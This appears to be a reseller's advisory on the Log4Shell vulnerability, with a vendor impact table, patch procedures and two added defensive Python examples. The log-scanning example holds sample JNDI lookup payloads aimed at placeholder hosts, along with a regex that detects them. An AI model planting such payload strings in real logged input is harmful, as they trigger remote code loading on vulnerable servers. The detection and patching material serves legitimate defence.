Log4Shell is a 0-day vulnerability with Critical Impact
Last Thursday, a new zero-day vulnerability, called Log4Shell, was detected in Log4j, a Java logging framework broadly used in enterprise environments to record events and messages generated by software applications. According to security researchers, the vulnerability had been under attack for more than a week prior to its public disclosure.

Update: The fix for CVE-2021-44228 in Apache Log4j 2.15.0 was found to be incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), attackers with control over Thread Context Map (MDC) input data can craft malicious input using a JNDI Lookup pattern, resulting in a denial of service (DoS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

How does CVE-2021-44228 work?

The flaw is a remote code execution vulnerability in Log4j. All an adversary needs to do to leverage it is send a specially crafted string containing the malicious code, which gets logged by Log4j version 2.0 or higher; this lets the threat actor load arbitrary code from an attacker-controlled domain onto the susceptible server and take control of it.
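The indicator defenders look for is the JNDI lookup string described above, as it appears in whatever gets logged (for a web application, typically a request header). The following is an added example, not code from the original post or from any vendor listed below: it scans constructed web-server log lines for that string and lists the hosts the vulnerable server would have called back to. The log lines and IP addresses are made up.

```python
import re
from typing import List, NamedTuple

# Constructed sample access-log lines (not taken from the original post). The second
# and third carry a JNDI lookup string in the User-Agent field; the first is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://198.51.100.23:1389/a}"
10.0.0.9 - - [10/Dec/2021:10:02:41 +0000] "POST /api HTTP/1.1" 500 "${JNDI:rmi://203.0.113.8/x}"
"""

# Log4j 2.x before 2.16.0 resolves any ${...} lookup embedded in a logged message; the
# jndi: lookup is the one that contacts a remote naming service, so a logged string of
# the form ${jndi:<scheme>://<host>...} is the indicator to alert on. Lookup names are
# matched case-insensitively, as Log4j itself lower-cases the lookup prefix.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)


class Hit(NamedTuple):
    line_no: int   # 1-based line in the scanned text
    scheme: str    # ldap, ldaps, rmi, dns, ... (lower-cased)
    host: str      # host[:port] the vulnerable server would have connected to


def scan_log(text: str) -> List[Hit]:
    """Return one Hit per JNDI lookup string found in the log text."""
    hits: List[Hit] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in JNDI_LOOKUP.finditer(line):
            hits.append(Hit(line_no, m.group(1).lower(), m.group(2)))
    return hits


def callback_hosts(hits: List[Hit]) -> List[str]:
    """Distinct host[:port] values, sorted, for egress-log correlation or blocking."""
    return sorted({h.host for h in hits})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(f"line {hit.line_no}: jndi lookup via {hit.scheme} to {hit.host}")
    print("hosts to check in egress logs:", callback_hosts(found))
```

A hit in the access log only proves the string was received; whether the server actually resolved it is answered by the outbound connection logs for the listed hosts.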
List of affected software
Inter Engineering contacted our software partners to find out if their solutions are in any way affected by the Log4Shell vulnerability. Here is the list. If you have questions or you are unsure whether your version is affected send us a message.
Vendor | Product Name | Mitigation actions |
---|---|---|
Clearswift | SEG (versions 5.3.0 & 5.4.0), SXG (versions 5.3.0 & 5.4.0), SIG (version 5.4.0) | Clearswift released version 5.4.1 that replaces the vulnerable version of Apache Log4j. |
Cryoserver | Cryoserver Email Archiving | Not affected by CVE-2021-44228 |
F-Secure | Policy Manager (all versions) | A deployable fix for this vulnerability was created. Follow the steps below. After the service restarts, the patch will automatically take effect. Note: this patch only applies to version 14 and version 15 of the affected software. It will also apply to version 13, even though this version is out of support. Policy Manager is not affected by CVE-2021-45046. |
F-Secure | Other F-Secure solutions | Not affected by CVE-2021-44228 or CVE-2021-45046 |
HelpSystems | GoAnywhere MFT version 5.7.0 or later, GoAnywhere Gateway version 2.7.0 or later, GoAnywhere MFT Agents 1.4.2 or later | GoAnywhere will issue updates to mitigate risks from both vulnerabilities (CVE-2021-44228 and CVE-2021-45046). The updates will be made available through my.goanywhere.com. Until then, administrators can mitigate the risk from CVE-2021-44228 with the workaround described below the table. |
One Identity | Safeguard for Privileged Sessions (version 6.x) | Disable the Safeguard Analytics functionality. This is the only component of Safeguard for Privileged Sessions that is impacted. |
OneSpan | Authentication Server (all versions), Virtual Appliance Authentication Server (all versions) | OneSpan is working on releasing a hotfix. In the meantime we recommend limiting access to product components (e.g., web administration components, APIs) as much as possible. If the product is accessible publicly, additional actions are required. These products are not affected by CVE-2021-45046. |
Stormshield | UTM Appliance (all versions) | Not affected by CVE-2021-44228 or CVE-2021-45046 |
Wallix | Access Manager (all versions) | To mitigate CVE-2021-44228, contact us to receive the patch files, then follow the procedure described below the table. |
Wallix | Bastion (all versions) | Not affected by CVE-2021-44228 or CVE-2021-45046 |

HelpSystems GoAnywhere workaround for CVE-2021-44228

GoAnywhere MFT (all affected versions), GoAnywhere Gateway (versions greater than or equal to 2.8.2) and GoAnywhere Agents (all affected versions):
- Edit <INSTALL_DIR>/config/system.properties and add the following line: log4j2.formatMsgNoLookups=true
- Restart the GoAnywhere service.

GoAnywhere Gateway (versions between 2.7.0 and 2.8.2):
- Edit (or create if it does not exist) <INSTALL_DIR>/gagateway.vmoptions and add the following line: -Dlog4j2.formatMsgNoLookups=true
- Edit (or create if it does not exist) <INSTALL_DIR>/bin/gagatewayd.vmoptions and add the following line: -Dlog4j2.formatMsgNoLookups=true
- Restart the gateway application.

For more information go to the GoAnywhere page for the Log4Shell vulnerability.

Wallix Access Manager patch procedure for CVE-2021-44228

1) Access Manager application installed on Linux
- Transfer the log4j-core-2.8.2.jar file in attachment to the server.
- Locate the file log4j-core-2.8.2.jar on the server; by default it is in the Access Manager directory /opt/wallix/wabam/lib.
- Make a backup of the file: cp log4j-core-2.8.2.jar log4j-core-2.8.2.jar.bak
- Replace the log4j-core-2.8.2.jar file with the one you retrieved from the KB: cp ./log4j-core-2.8.2.jar /opt/wallix/wabam/lib/log4j-core-2.8.2.jar
- Verify the hash of the copied file against the .sha256sum you downloaded before: sha256sum /opt/wallix/wabam/lib/log4j-core-2.8.2.jar
- Restart the Access Manager service: systemctl restart wabam

2) Access Manager application installed on Windows
- Transfer the log4j-core-2.8.2.jar file in attachment to the server.
- Locate the file log4j-core-2.8.2.jar on the server; by default it is in the Access Manager directory C:\Program Files\WALLIX\wabam\lib.
- Make a backup of the file.
- Replace the log4j-core-2.8.2.jar file with the one you retrieved from the KB.
- From a PowerShell console, verify the hash of the copied file against the .sha256sum you downloaded before: Get-FileHash 'C:\Program Files\WALLIX\wabam\lib\log4j-core-2.8.2.jar'
- Restart the wabam / WALLIX Access Manager service.

3) Access Manager as an appliance
- Transfer the log4j-core-2.8.2.jar file in attachment to the server, into /home/wabadmin.
- Connect to the appliance as wabadmin and become root: sudo -i
- The following commands need to be entered as is.
- Make a backup of the current file: docker cp access-manager_access_manager_1:/opt/wallix/wabam/lib/log4j-core-2.8.2.jar /home/wabadmin/log4j-core-2.8.2.jar.bak
- Replace the file with the one you retrieved from the KB: docker cp /home/wabadmin/log4j-core-2.8.2.jar access-manager_access_manager_1:/opt/wallix/wabam/lib/log4j-core-2.8.2.jar
- Verify the hash of the copied file against the .sha256sum you downloaded before: docker exec access-manager_access_manager_1 /usr/bin/sha256sum /opt/wallix/wabam/lib/log4j-core-2.8.2.jar
- Restart the Access Manager service: docker restart access-manager_access_manager_1
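Both the 2.15.0/2.16.0 guidance above and the Wallix procedure come down to one question per server: is the log4j-core jar still the vulnerable one, and is the replacement the file the vendor shipped? The following added example (not the vendors' code, nor part of the original post) answers both for a jar read from disk or, as here, built in memory as a constructed fixture. The 2.16.0 threshold and the JndiLookup class path are the assumptions it encodes; the 2.8.2 version string is the one named in the Wallix steps.

```python
import hashlib
import io
import re
import zipfile
from typing import NamedTuple, Optional

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 16, 0)  # per the advisory: 2.15.0 is incomplete, 2.16.0 disables JNDI

class Assessment(NamedTuple):
    version: Optional[str]  # Implementation-Version from the manifest, if present
    has_jndi_lookup: bool   # JndiLookup class (abused by CVE-2021-44228) present
    vulnerable: bool

def version_tuple(version: str):
    return tuple(int(n) for n in re.findall(r"\d+", version)[:3])

def assess_log4j_jar(jar_bytes: bytes) -> Assessment:
    """Decide whether a log4j-core jar still needs patching, from its manifest and class list."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", errors="replace")
            for line in manifest.splitlines():
                if line.startswith("Implementation-Version:"):
                    version = line.split(":", 1)[1].strip()
    has_jndi = JNDI_LOOKUP_CLASS in names
    # A jar with JndiLookup removed cannot perform the lookup; 2.16.0+ disables JNDI by
    # default. Anything else (including an unversioned jar) is treated as vulnerable.
    vulnerable = has_jndi and (version is None or version_tuple(version) < FIXED_VERSION)
    return Assessment(version, has_jndi, vulnerable)

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def sha256_matches(jar_bytes: bytes, expected_hex: str) -> bool:
    """The post-copy check from the Wallix procedure: compare against the vendor's .sha256sum."""
    return sha256_hex(jar_bytes) == expected_hex.strip().lower()

def make_test_jar(version: str, include_jndi_lookup: bool) -> bytes:
    """Constructed in-memory jar for demonstration only; not a real Log4j build."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()
```

Run it against a real file with `assess_log4j_jar(open(path, "rb").read())`; a jar that is shaded into another application's jar will not be found this way and needs the nested archives unpacked first.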
Public Sources
- How attackers are trying to exploit Log4Shell
- What you need to know about the Log4J vulnerability rocking the internet
- Log4Shell Security Alert: Stormshield's product response
- CISA Apache Log4j Vulnerability Guidance